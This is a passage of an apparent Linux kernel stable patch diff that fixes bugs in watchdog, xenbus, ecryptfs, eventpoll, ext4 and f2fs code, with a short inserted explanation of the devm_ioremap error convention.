+@@ -62,10 +61,7 @@ static int bd9576_wdt_stop(struct watchdog_device *wdd)
+ {
+ 	struct bd9576_wdt_priv *priv = watchdog_get_drvdata(wdd);
+ 
+-	if (!priv->always_running)
+-		bd9576_wdt_disable(priv);
+-	else
+-		set_bit(WDOG_HW_RUNNING, &wdd->status);
++	bd9576_wdt_disable(priv);
+ 
+ 	return 0;
+ }
+@@ -264,9 +260,6 @@ static int bd9576_wdt_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	priv->always_running = device_property_read_bool(dev->parent,
+-							 "always-running");
+-
+ 	watchdog_set_drvdata(&priv->wdd, priv);
+ 
+ 	priv->wdd.info			= &bd957x_wdt_ident;
+@@ -281,9 +274,6 @@ static int bd9576_wdt_probe(struct platform_device *pdev)
+ 
+ 	watchdog_stop_on_reboot(&priv->wdd);
+ 
+-	if (priv->always_running)
+-		bd9576_wdt_start(&priv->wdd);
+-
+ 	return devm_watchdog_register_device(dev, &priv->wdd);
+ }
+ 
+diff --git a/drivers/watchdog/sa1100_wdt.c b/drivers/watchdog/sa1100_wdt.c
+index 82ac5d19f519e..1745d7cafb762 100644
+--- a/drivers/watchdog/sa1100_wdt.c
++++ b/drivers/watchdog/sa1100_wdt.c
+@@ -191,9 +191,8 @@ static int sa1100dog_probe(struct platform_device *pdev)
+ 	if (!res)
+ 		return -ENXIO;
+ 	reg_base = devm_ioremap(&pdev->dev, res->start, resource_size(res));
+-	ret = PTR_ERR_OR_ZERO(reg_base);
+-	if (ret)
+-		return ret;
++	if (!reg_base)
++		return -ENOMEM;
+ 
+ 	clk = clk_get(NULL, "OSTIMER0");
+ 	if (IS_ERR(clk)) {
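
The sa1100_wdt fix above corrects a mismatched error convention: devm_ioremap() reports failure with NULL, not an ERR_PTR, so the old PTR_ERR_OR_ZERO() check treated every failure as success. A short sketch of checking that convention correctly (function name illustrative):

#include <linux/device.h>
#include <linux/err.h>
#include <linux/errno.h>
#include <linux/io.h>
#include <linux/types.h>

static int map_regs(struct device *dev, resource_size_t start,
		    resource_size_t size, void __iomem **out)
{
	void __iomem *base = devm_ioremap(dev, start, size);

	if (!base)		/* devm_ioremap() returns NULL on failure */
		return -ENOMEM;
	*out = base;
	return 0;
}
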
+diff --git a/drivers/xen/xenbus/xenbus_probe.c b/drivers/xen/xenbus/xenbus_probe.c
+index 3205e5d724c8c..1a9ded0cddcb0 100644
+--- a/drivers/xen/xenbus/xenbus_probe.c
++++ b/drivers/xen/xenbus/xenbus_probe.c
+@@ -65,13 +65,17 @@
+ #include "xenbus.h"
+ 
+ 
+-static int xs_init_irq;
++static int xs_init_irq = -1;
+ int xen_store_evtchn;
+ EXPORT_SYMBOL_GPL(xen_store_evtchn);
+ 
+ struct xenstore_domain_interface *xen_store_interface;
+ EXPORT_SYMBOL_GPL(xen_store_interface);
+ 
++#define XS_INTERFACE_READY \
++	((xen_store_interface != NULL) && \
++	 (xen_store_interface->connection == XENSTORE_CONNECTED))
++
+ enum xenstore_init xen_store_domain_type;
+ EXPORT_SYMBOL_GPL(xen_store_domain_type);
+ 
+@@ -751,19 +755,19 @@ static void xenbus_probe(void)
+ {
+ 	xenstored_ready = 1;
+ 
+-	if (!xen_store_interface) {
++	if (!xen_store_interface)
+ 		xen_store_interface = memremap(xen_store_gfn << XEN_PAGE_SHIFT,
+ 					       XEN_PAGE_SIZE, MEMREMAP_WB);
+-		/*
+-		 * Now it is safe to free the IRQ used for xenstore late
+-		 * initialization. No need to unbind: it is about to be
+-		 * bound again from xb_init_comms. Note that calling
+-		 * unbind_from_irqhandler now would result in xen_evtchn_close()
+-		 * being called and the event channel not being enabled again
+-		 * afterwards, resulting in missed event notifications.
+-		 */
++	/*
++	 * Now it is safe to free the IRQ used for xenstore late
++	 * initialization. No need to unbind: it is about to be
++	 * bound again from xb_init_comms. Note that calling
++	 * unbind_from_irqhandler now would result in xen_evtchn_close()
++	 * being called and the event channel not being enabled again
++	 * afterwards, resulting in missed event notifications.
++	 */
++	if (xs_init_irq >= 0)
+ 		free_irq(xs_init_irq, &xb_waitq);
+-	}
+ 
+ 	/*
+ 	 * In the HVM case, xenbus_init() deferred its call to
+@@ -822,7 +826,7 @@ static int __init xenbus_probe_initcall(void)
+ 	if (xen_store_domain_type == XS_PV ||
+ 	    (xen_store_domain_type == XS_HVM &&
+ 	     !xs_hvm_defer_init_for_callback() &&
+-	     xen_store_interface != NULL))
++	     XS_INTERFACE_READY))
+ 		xenbus_probe();
+ 
+ 	/*
+@@ -831,7 +835,7 @@ static int __init xenbus_probe_initcall(void)
+ 	 * started, then probe.  It will be triggered when communication
+ 	 * starts happening, by waiting on xb_waitq.
+ 	 */
+-	if (xen_store_domain_type == XS_LOCAL || xen_store_interface == NULL) {
++	if (xen_store_domain_type == XS_LOCAL || !XS_INTERFACE_READY) {
+ 		struct task_struct *probe_task;
+ 
+ 		probe_task = kthread_run(xenbus_probe_thread, NULL,
+@@ -1014,6 +1018,12 @@ static int __init xenbus_init(void)
+ 			xen_store_interface =
+ 				memremap(xen_store_gfn << XEN_PAGE_SHIFT,
+ 					 XEN_PAGE_SIZE, MEMREMAP_WB);
++			if (!xen_store_interface) {
++				pr_err("%s: cannot map HVM_PARAM_STORE_PFN=%llx\n",
++				       __func__, v);
++				err = -EINVAL;
++				goto out_error;
++			}
+ 			if (xen_store_interface->connection != XENSTORE_CONNECTED)
+ 				wait = true;
+ 		}
+diff --git a/fs/ecryptfs/keystore.c b/fs/ecryptfs/keystore.c
+index 3fe41964c0d8d..7f9f68c00ef63 100644
+--- a/fs/ecryptfs/keystore.c
++++ b/fs/ecryptfs/keystore.c
+@@ -300,9 +300,11 @@ write_tag_66_packet(char *signature, u8 cipher_code,
+ 	 *         | Key Identifier Size      | 1 or 2 bytes |
+ 	 *         | Key Identifier           | arbitrary    |
+ 	 *         | File Encryption Key Size | 1 or 2 bytes |
++	 *         | Cipher Code              | 1 byte       |
+ 	 *         | File Encryption Key      | arbitrary    |
++	 *         | Checksum                 | 2 bytes      |
+ 	 */
+-	data_len = (5 + ECRYPTFS_SIG_SIZE_HEX + crypt_stat->key_size);
++	data_len = (8 + ECRYPTFS_SIG_SIZE_HEX + crypt_stat->key_size);
+ 	*packet = kmalloc(data_len, GFP_KERNEL);
+ 	message = *packet;
+ 	if (!message) {
+diff --git a/fs/eventpoll.c b/fs/eventpoll.c
+index eccecd3fac90c..7221072f39fad 100644
+--- a/fs/eventpoll.c
++++ b/fs/eventpoll.c
+@@ -839,6 +839,34 @@ static __poll_t __ep_eventpoll_poll(struct file *file, poll_table *wait, int dep
+ 	return res;
+ }
+ 
++/*
++ * The ffd.file pointer may be in the process of being torn down due to
++ * being closed, but we may not have finished eventpoll_release() yet.
++ *
++ * Normally, even with the atomic_long_inc_not_zero, the file may have
++ * been free'd and then gotten re-allocated to something else (since
++ * files are not RCU-delayed, they are SLAB_TYPESAFE_BY_RCU).
++ *
++ * But for epoll, users hold the ep->mtx mutex, and as such any file in
++ * the process of being free'd will block in eventpoll_release_file()
++ * and thus the underlying file allocation will not be free'd, and the
++ * file re-use cannot happen.
++ *
++ * For the same reason we can avoid a rcu_read_lock() around the
++ * operation - 'ffd.file' cannot go away even if the refcount has
++ * reached zero (but we must still not call out to ->poll() functions
++ * etc).
++ */
++static struct file *epi_fget(const struct epitem *epi)
++{
++	struct file *file;
++
++	file = epi->ffd.file;
++	if (!atomic_long_inc_not_zero(&file->f_count))
++		file = NULL;
++	return file;
++}
++
+ /*
+  * Differs from ep_eventpoll_poll() in that internal callers already have
+  * the ep->mtx so we need to start from depth=1, such that mutex_lock_nested()
+@@ -847,14 +875,22 @@ static __poll_t __ep_eventpoll_poll(struct file *file, poll_table *wait, int dep
+ static __poll_t ep_item_poll(const struct epitem *epi, poll_table *pt,
+ 				 int depth)
+ {
+-	struct file *file = epi->ffd.file;
++	struct file *file = epi_fget(epi);
+ 	__poll_t res;
+ 
++	/*
++	 * We could return EPOLLERR | EPOLLHUP or something, but let's
++	 * treat this more as "file doesn't exist, poll didn't happen".
++	 */
++	if (!file)
++		return 0;
++
+ 	pt->_key = epi->event.events;
+ 	if (!is_file_epoll(file))
+ 		res = vfs_poll(file, pt);
+ 	else
+ 		res = __ep_eventpoll_poll(file, pt, depth);
++	fput(file);
+ 	return res & epi->event.events;
+ }
+ 
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index a843f964332c2..71ce3ed5ab6ba 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -5608,8 +5608,73 @@ static bool ext4_mb_discard_preallocations_should_retry(struct super_block *sb,
+ 	return ret;
+ }
+ 
+-static ext4_fsblk_t ext4_mb_new_blocks_simple(handle_t *handle,
+-				struct ext4_allocation_request *ar, int *errp);
++/*
++ * Simple allocator for Ext4 fast commit replay path. It searches for blocks
++ * linearly starting at the goal block and also excludes the blocks which
++ * are going to be in use after fast commit replay.
++ */
++static ext4_fsblk_t
++ext4_mb_new_blocks_simple(struct ext4_allocation_request *ar, int *errp)
++{
++	struct buffer_head *bitmap_bh;
++	struct super_block *sb = ar->inode->i_sb;
++	struct ext4_sb_info *sbi = EXT4_SB(sb);
++	ext4_group_t group, nr;
++	ext4_grpblk_t blkoff;
++	ext4_grpblk_t max = EXT4_CLUSTERS_PER_GROUP(sb);
++	ext4_grpblk_t i = 0;
++	ext4_fsblk_t goal, block;
++	struct ext4_super_block *es = EXT4_SB(sb)->s_es;
++
++	goal = ar->goal;
++	if (goal < le32_to_cpu(es->s_first_data_block) ||
++			goal >= ext4_blocks_count(es))
++		goal = le32_to_cpu(es->s_first_data_block);
++
++	ar->len = 0;
++	ext4_get_group_no_and_offset(sb, goal, &group, &blkoff);
++	for (nr = ext4_get_groups_count(sb); nr > 0; nr--) {
++		bitmap_bh = ext4_read_block_bitmap(sb, group);
++		if (IS_ERR(bitmap_bh)) {
++			*errp = PTR_ERR(bitmap_bh);
++			pr_warn("Failed to read block bitmap\n");
++			return 0;
++		}
++
++		while (1) {
++			i = mb_find_next_zero_bit(bitmap_bh->b_data, max,
++						blkoff);
++			if (i >= max)
++				break;
++			if (ext4_fc_replay_check_excluded(sb,
++				ext4_group_first_block_no(sb, group) +
++				EXT4_C2B(sbi, i))) {
++				blkoff = i + 1;
++			} else
++				break;
++		}
++		brelse(bitmap_bh);
++		if (i < max)
++			break;
++
++		if (++group >= ext4_get_groups_count(sb))
++			group = 0;
++
++		blkoff = 0;
++	}
++
++	if (i >= max) {
++		*errp = -ENOSPC;
++		return 0;
++	}
++
++	block = ext4_group_first_block_no(sb, group) + EXT4_C2B(sbi, i);
++	ext4_mb_mark_bb(sb, block, 1, 1);
++	ar->len = 1;
++
++	*errp = 0;
++	return block;
++}
+ 
+ /*
+  * Main entry point into mballoc to allocate blocks
+@@ -5634,7 +5699,7 @@ ext4_fsblk_t ext4_mb_new_blocks(handle_t *handle,
+ 
+ 	trace_ext4_request_blocks(ar);
+ 	if (sbi->s_mount_state & EXT4_FC_REPLAY)
+-		return ext4_mb_new_blocks_simple(handle, ar, errp);
++		return ext4_mb_new_blocks_simple(ar, errp);
+ 
+ 	/* Allow to use superuser reservation for quota file */
+ 	if (ext4_is_quota_file(ar->inode))
+@@ -5864,69 +5929,6 @@ ext4_mb_free_metadata(handle_t *handle, struct ext4_buddy *e4b,
+ 	return 0;
+ }
+ 
+-/*
+- * Simple allocator for Ext4 fast commit replay path. It searches for blocks
+- * linearly starting at the goal block and also excludes the blocks which
+- * are going to be in use after fast commit replay.
+- */
+-static ext4_fsblk_t ext4_mb_new_blocks_simple(handle_t *handle,
+-				struct ext4_allocation_request *ar, int *errp)
+-{
+-	struct buffer_head *bitmap_bh;
+-	struct super_block *sb = ar->inode->i_sb;
+-	ext4_group_t group;
+-	ext4_grpblk_t blkoff;
+-	ext4_grpblk_t max = EXT4_CLUSTERS_PER_GROUP(sb);
+-	ext4_grpblk_t i = 0;
+-	ext4_fsblk_t goal, block;
+-	struct ext4_super_block *es = EXT4_SB(sb)->s_es;
+-
+-	goal = ar->goal;
+-	if (goal < le32_to_cpu(es->s_first_data_block) ||
+-			goal >= ext4_blocks_count(es))
+-		goal = le32_to_cpu(es->s_first_data_block);
+-
+-	ar->len = 0;
+-	ext4_get_group_no_and_offset(sb, goal, &group, &blkoff);
+-	for (; group < ext4_get_groups_count(sb); group++) {
+-		bitmap_bh = ext4_read_block_bitmap(sb, group);
+-		if (IS_ERR(bitmap_bh)) {
+-			*errp = PTR_ERR(bitmap_bh);
+-			pr_warn("Failed to read block bitmap\n");
+-			return 0;
+-		}
+-
+-		ext4_get_group_no_and_offset(sb,
+-			max(ext4_group_first_block_no(sb, group), goal),
+-			NULL, &blkoff);
+-		while (1) {
+-			i = mb_find_next_zero_bit(bitmap_bh->b_data, max,
+-						blkoff);
+-			if (i >= max)
+-				break;
+-			if (ext4_fc_replay_check_excluded(sb,
+-				ext4_group_first_block_no(sb, group) + i)) {
+-				blkoff = i + 1;
+-			} else
+-				break;
+-		}
+-		brelse(bitmap_bh);
+-		if (i < max)
+-			break;
+-	}
+-
+-	if (group >= ext4_get_groups_count(sb) || i >= max) {
+-		*errp = -ENOSPC;
+-		return 0;
+-	}
+-
+-	block = ext4_group_first_block_no(sb, group) + i;
+-	ext4_mb_mark_bb(sb, block, 1, 1);
+-	ar->len = 1;
+-
+-	return block;
+-}
+-
+ static void ext4_free_blocks_simple(struct inode *inode, ext4_fsblk_t block,
+ 					unsigned long count)
+ {
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index bbfb37390723c..8b13832238484 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -2901,7 +2901,7 @@ static int ext4_tmpfile(struct user_namespace *mnt_userns, struct inode *dir,
+ 	inode = ext4_new_inode_start_handle(mnt_userns, dir, mode,
+ 					    NULL, 0, NULL,
+ 					    EXT4_HT_DIR,
+-			EXT4_MAXQUOTAS_INIT_BLOCKS(dir->i_sb) +
++			EXT4_MAXQUOTAS_TRANS_BLOCKS(dir->i_sb) +
+ 			  4 + EXT4_XATTR_TRANS_BLOCKS);
+ 	handle = ext4_journal_current_handle();
+ 	err = PTR_ERR(inode);
+diff --git a/fs/f2fs/checkpoint.c b/fs/f2fs/checkpoint.c
+index 3ec203bbd5593..13d8774706758 100644
+--- a/fs/f2fs/checkpoint.c
++++ b/fs/f2fs/checkpoint.c
+@@ -797,7 +797,7 @@ static void write_orphan_inodes(struct f2fs_sb_info *sbi, block_t start_blk)
+ 	 */
+ 	head = &im->ino_list;
+ 
+-	/* loop for each orphan inode entry and write them in Jornal block */
++	/* loop for each orphan inode entry and write them in journal block */
+ 	list_for_each_entry(orphan, head, list) {
+ 		if (!page) {
+ 			page = f2fs_grab_meta_page(sbi, start_blk++);
+@@ -1127,7 +1127,7 @@ int f2fs_sync_dirty_inodes(struct f2fs_sb_info *sbi, enum inode_type type,
+ 	} else {
+ 		/*
+ 		 * We should submit bio, since it exists several
+-		 * wribacking dentry pages in the freeing inode.
++		 * writebacking dentry pages in the freeing inode.
+ 		 */
+ 		f2fs_submit_merged_write(sbi, DATA);
+ 		cond_resched();
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index df6dfd7de6d0d..84585dba86a57 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -1264,7 +1264,7 @@ static int f2fs_write_compressed_pages(struct compress_ctx *cc,
+ 	int i, err;
+ 	bool quota_inode = IS_NOQUOTA(inode);
+ 
+-	/* we should bypass data pages to proceed the kworkder jobs */
++	/* we should bypass data pages to proceed the kworker jobs */
+ 	if (unlikely(f2fs_cp_error(sbi))) {
+ 		mapping_set_error(cc->rpages[0]->mapping, -EIO);
+ 		goto out_free;
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index b83b8ac29f430..0b0e3d44e158e 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -2363,7 +2363,7 @@ static int f2fs_mpage_readpages(struct inode *inode,
+ 
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+ 		if (f2fs_compressed_file(inode)) {
+-			/* there are remained comressed pages, submit them */
++			/* there are remained compressed pages, submit them */
+ 			if (!f2fs_cluster_can_merge_page(&cc, page->index)) {
+ 				ret = f2fs_read_multi_pages(&cc, &bio,
+ 							max_nr_pages,
+@@ -2779,7 +2779,7 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 
+ 	trace_f2fs_writepage(page, DATA);
+ 
+-	/* we should bypass data pages to proceed the kworkder jobs */
++	/* we should bypass data pages to proceed the kworker jobs */
+ 	if (unlikely(f2fs_cp_error(sbi))) {
+ 		mapping_set_error(page->mapping, -EIO);
+ 		/*
+@@ -2898,7 +2898,7 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ redirty_out:
+ 	redirty_page_for_writepage(wbc, page);
+ 	/*
+-	 * pageout() in MM traslates EAGAIN, so calls handle_write_error()
++	 * pageout() in MM translates EAGAIN, so calls handle_write_error()
+ 	 * -> mapping_set_error() -> set_bit(AS_EIO, ...).
+ 	 * file_write_and_wait_range() will see EIO error, which is critical
+ 	 * to return value of fsync() followed by atomic_write failure to user.
+@@ -2932,7 +2932,7 @@ static int f2fs_write_data_page(struct page *page,
+ }
+ 
+ /*
+- * This function was copied from write_cche_pages from mm/page-writeback.c.
++ * This function was copied from write_cache_pages from mm/page-writeback.c.
+  * The major change is making write step of cold data page separately from
+  * warm/hot data page.
+  */
+@@ -4195,7 +4195,7 @@ static int f2fs_iomap_begin(struct inode *inode, loff_t offset, loff_t length,
+ 	if (WARN_ON_ONCE(map.m_pblk == COMPRESS_ADDR))
+ 		return -EINVAL;
+ 
+-	if (map.m_pblk != NULL_ADDR) {
++	if (map.m_flags & F2FS_MAP_MAPPED) {
+ 		iomap->length = blks_to_bytes(inode, map.m_len);
+ 		iomap->type = IOMAP_MAPPED;
+ 		iomap->flags |= IOMAP_F_MERGED;
+diff --git a/fs/f2fs/extent_cache.c b/fs/f2fs/extent_cache.c
+index 16692c96e7650..c55359267d438 100644
+--- a/fs/f2fs/extent_cache.c
++++ b/fs/f2fs/extent_cache.c
+@@ -205,7 +205,7 @@ struct rb_node **f2fs_lookup_rb_tree_for_insert(struct f2fs_sb_info *sbi,
+  * @prev_ex: extent before ofs
+  * @next_ex: extent after ofs
+  * @insert_p: insert point for new extent at ofs
+- * in order to simpfy the insertion after.
++ * in order to simplify the insertion after.
+  * tree must stay unchanged between lookup and insertion.
+  */
+ struct rb_entry *f2fs_lookup_rb_tree_ret(struct rb_root_cached *root,
+@@ -662,7 +662,7 @@ static void __update_extent_tree_range(struct inode *inode,
+ 	if (!en)
+ 		en = next_en;
+ 
+-	/* 2. invlidate all extent nodes in range [fofs, fofs + len - 1] */
++	/* 2. invalidate all extent nodes in range [fofs, fofs + len - 1] */
+ 	while (en && en->ei.fofs < end) {
+ 		unsigned int org_end;
+ 		int parts = 0;	/* # of parts current extent split into */
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 2fbc8d89c600b..1d73582d1f63d 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -305,7 +305,7 @@ static int f2fs_do_sync_file(struct file *file, loff_t start, loff_t end,
+ 		 * for OPU case, during fsync(), node can be persisted before
+ 		 * data when lower device doesn't support write barrier, result
+ 		 * in data corruption after SPO.
+-		 * So for strict fsync mode, force to use atomic write sematics
++		 * So for strict fsync mode, force to use atomic write semantics
+ 		 * to keep write order in between data/node and last node to
+ 		 * avoid potential data corruption.
+ 		 */
+@@ -940,9 +940,14 @@ int f2fs_setattr(struct user_namespace *mnt_userns, struct dentry *dentry,
+ 				  ATTR_GID | ATTR_TIMES_SET))))
+ 		return -EPERM;
+ 
+-	if ((attr->ia_valid & ATTR_SIZE) &&
+-		!f2fs_is_compress_backend_ready(inode))
+-		return -EOPNOTSUPP;
++	if ((attr->ia_valid & ATTR_SIZE)) {
++		if (!f2fs_is_compress_backend_ready(inode))
++			return -EOPNOTSUPP;
++		if (is_inode_flag_set(inode, FI_COMPRESS_RELEASED) &&
++			!IS_ALIGNED(attr->ia_size,
++			F2FS_BLK_TO_BYTES(F2FS_I(inode)->i_cluster_size)))
++			return -EINVAL;
++	}
+ 
+ 	err = setattr_prepare(mnt_userns, dentry, attr);
+ 	if (err)
+@@ -1314,6 +1319,9 @@ static int __clone_blkaddrs(struct inode *src_inode, struct inode *dst_inode,
+ 				f2fs_put_page(psrc, 1);
+ 				return PTR_ERR(pdst);
+ 			}
++
++			f2fs_wait_on_page_writeback(pdst, DATA, true, true);
++
+ 			memcpy_page(pdst, 0, psrc, 0, PAGE_SIZE);
+ 			set_page_dirty(pdst);
+ 			set_page_private_gcing(pdst);
+@@ -1801,15 +1809,6 @@ static long f2fs_fallocate(struct file *file, int mode,
+ 		(mode & (FALLOC_FL_COLLAPSE_RANGE | FALLOC_FL_INSERT_RANGE)))
+ 		return -EOPNOTSUPP;
+ 
+-	/*
+-	 * Pinned file should not support partial trucation since the block
+-	 * can be used by applications.
+-	 */
+-	if ((f2fs_compressed_file(inode) || f2fs_is_pinned_file(inode)) &&
+-		(mode & (FALLOC_FL_PUNCH_HOLE | FALLOC_FL_COLLAPSE_RANGE |
+-			FALLOC_FL_ZERO_RANGE | FALLOC_FL_INSERT_RANGE)))
+-		return -EOPNOTSUPP;
+-
+ 	if (mode & ~(FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE |
+ 			FALLOC_FL_COLLAPSE_RANGE | FALLOC_FL_ZERO_RANGE |
+ 			FALLOC_FL_INSERT_RANGE))
+@@ -1817,6 +1816,17 @@ static long f2fs_fallocate(struct file *file, int mode,
+ 
+ 	inode_lock(inode);
+ 
++	/*
++	 * Pinned file should not support partial truncation since the block
++	 * can be used by applications.
++	 */
++	if ((f2fs_compressed_file(inode) || f2fs_is_pinned_file(inode)) &&
++		(mode & (FALLOC_FL_PUNCH_HOLE | FALLOC_FL_COLLAPSE_RANGE |
++			FALLOC_FL_ZERO_RANGE | FALLOC_FL_INSERT_RANGE))) {
++		ret = -EOPNOTSUPP;
++		goto out;
++	}
++
+ 	ret = file_modified(file);
+ 	if (ret)
+ 		goto out;
+@@ -1852,7 +1862,7 @@ static long f2fs_fallocate(struct file *file, int mode,
+ static int f2fs_release_file(struct inode *inode, struct file *filp)
+ {
+ 	/*
+-	 * f2fs_relase_file is called at every close calls. So we should
++	 * f2fs_release_file is called at every close calls. So we should
+ 	 * not drop any inmemory pages by close called by other process.
+ 	 */
+ 	if (!(filp->f_mode & FMODE_WRITE) ||
+@@ -2811,7 +2821,8 @@ static int f2fs_move_file_range(struct file *file_in, loff_t pos_in,
+ 			goto out;
+ 	}
+ 
+-	if (f2fs_compressed_file(src) || f2fs_compressed_file(dst)) {
++	if (f2fs_compressed_file(src) || f2fs_compressed_file(dst) ||
++		f2fs_is_pinned_file(src) || f2fs_is_pinned_file(dst)) {
+ 		ret = -EOPNOTSUPP;
+ 		goto out_unlock;
+ 	}
+@@ -3465,9 +3476,6 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 	if (!f2fs_sb_has_compression(sbi))
+ 		return -EOPNOTSUPP;
+ 
+-	if (!f2fs_compressed_file(inode))
+-		return -EINVAL;
+-
+ 	if (f2fs_readonly(sbi->sb))
+ 		return -EROFS;
+ 
+@@ -3486,7 +3494,8 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 		goto out;
+ 	}
+ 
+-	if (is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
++	if (!f2fs_compressed_file(inode) ||
++		is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+@@ -3511,9 +3520,12 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 		struct dnode_of_data dn;
+ 		pgoff_t end_offset, count;
+ 
++		f2fs_lock_op(sbi);
++
+ 		set_new_dnode(&dn, inode, NULL, NULL, 0);
+ 		ret = f2fs_get_dnode_of_data(&dn, page_idx, LOOKUP_NODE);
+ 		if (ret) {
++			f2fs_unlock_op(sbi);
+ 			if (ret == -ENOENT) {
+ 				page_idx = f2fs_get_next_page_offset(&dn,
+ 								page_idx);
+@@ -3531,6 +3543,8 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 
+ 		f2fs_put_dnode(&dn);
+ 
++		f2fs_unlock_op(sbi);
++
+ 		if (ret < 0)
+ 			break;
+ 
+@@ -3584,7 +3598,8 @@ static int reserve_compress_blocks(struct dnode_of_data *dn, pgoff_t count,
+ 
+ 	while (count) {
+ 		int compr_blocks = 0;
+-		blkcnt_t reserved;
++		blkcnt_t reserved = 0;
++		blkcnt_t to_reserved;
+ 		int ret;
+ 
+ 		for (i = 0; i < cluster_size; i++) {
+@@ -3604,20 +3619,26 @@ static int reserve_compress_blocks(struct dnode_of_data *dn, pgoff_t count,
+ 			 * fails in release_compress_blocks(), so NEW_ADDR
+ 			 * is a possible case.
+ 			 */
+-			if (blkaddr == NEW_ADDR ||
+-				__is_valid_data_blkaddr(blkaddr)) {
++			if (blkaddr == NEW_ADDR) {
++				reserved++;
++				continue;
++			}
++			if (__is_valid_data_blkaddr(blkaddr)) {
+ 				compr_blocks++;
+ 				continue;
+ 			}
+ 		}
+ 
+-		reserved = cluster_size - compr_blocks;
++		to_reserved = cluster_size - compr_blocks - reserved;
+ 
+ 		/* for the case all blocks in cluster were reserved */
+-		if (reserved == 1)
++		if (to_reserved == 1) {
++			dn->ofs_in_node += cluster_size;
+ 			goto next;
++		}
+ 
+-		ret = inc_valid_block_count(sbi, dn->inode, &reserved, false);
++		ret = inc_valid_block_count(sbi, dn->inode,
++						&to_reserved, false);
+ 		if (unlikely(ret))
+ 			return ret;
+ 
+@@ -3628,7 +3649,7 @@ static int reserve_compress_blocks(struct dnode_of_data *dn, pgoff_t count,
+ 
+ 		f2fs_i_compr_blocks_update(dn->inode, compr_blocks, true);
+ 
+-		*reserved_blocks += reserved;
++		*reserved_blocks += to_reserved;
+ next:
+ 		count -= cluster_size;
+ 	}
+@@ -3647,9 +3668,6 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 	if (!f2fs_sb_has_compression(sbi))
+ 		return -EOPNOTSUPP;
+ 
+-	if (!f2fs_compressed_file(inode))
+-		return -EINVAL;
+-
+ 	if (f2fs_readonly(sbi->sb))
+ 		return -EROFS;
+ 
+@@ -3661,7 +3679,8 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 
+ 	inode_lock(inode);
+ 
+-	if (!is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
++	if (!f2fs_compressed_file(inode) ||
++		!is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
+ 		ret = -EINVAL;
+ 		goto unlock_inode;
+ 	}
+@@ -3678,9 +3697,12 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 		struct dnode_of_data dn;
+ 		pgoff_t end_offset, count;
+ 
++		f2fs_lock_op(sbi);
++
+ 		set_new_dnode(&dn, inode, NULL, NULL, 0);
+ 		ret = f2fs_get_dnode_of_data(&dn, page_idx, LOOKUP_NODE);
+ 		if (ret) {
++			f2fs_unlock_op(sbi);
+ 			if (ret == -ENOENT) {
+ 				page_idx = f2fs_get_next_page_offset(&dn,
+ 								page_idx);
+@@ -3698,6 +3720,8 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 
+ 		f2fs_put_dnode(&dn);
+ 
++		f2fs_unlock_op(sbi);
++
+ 		if (ret < 0)
+ 			break;
+ 
+@@ -4065,9 +4089,6 @@ static int f2fs_ioc_decompress_file(struct file *filp, unsigned long arg)
+ 	if (!(filp->f_mode & FMODE_WRITE))
+ 		return -EBADF;
+ 
+-	if (!f2fs_compressed_file(inode))
+-		return -EINVAL;
+-
+ 	f2fs_balance_fs(sbi, true);
+ 
+ 	file_start_write(filp);
+@@ -4078,7 +4099,8 @@ static int f2fs_ioc_decompress_file(struct file *filp, unsigned long arg)
+ 		goto out;
+ 	}
+ 
+-	if (is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
++	if (!f2fs_compressed_file(inode) ||
++		is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+@@ -4137,9 +4159,6 @@ static int f2fs_ioc_compress_file(struct file *filp, unsigned long arg)
+ 	if (!(filp->f_mode & FMODE_WRITE))
+ 		return -EBADF;
+ 
+-	if (!f2fs_compressed_file(inode))
+-		return -EINVAL;
+-
+ 	f2fs_balance_fs(sbi, true);
+ 
+ 	file_start_write(filp);
+@@ -4150,7 +4169,8 @@ static int f2fs_ioc_compress_file(struct file *filp, unsigned long arg)
+ 		goto out;
+ 	}
+ 
+-	if (is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
++	if (!f2fs_compressed_file(inode) ||
++		is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index d4662ccb94c8f..5a661a0e76632 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1566,10 +1566,15 @@ static int gc_data_segment(struct f2fs_sb_info *sbi, struct f2fs_summary *sum,
+ 			int err;
+ 
+ 			inode = f2fs_iget(sb, dni.ino);
+-			if (IS_ERR(inode) || is_bad_inode(inode) ||
+-					special_file(inode->i_mode))
++			if (IS_ERR(inode))
+ 				continue;
+ 
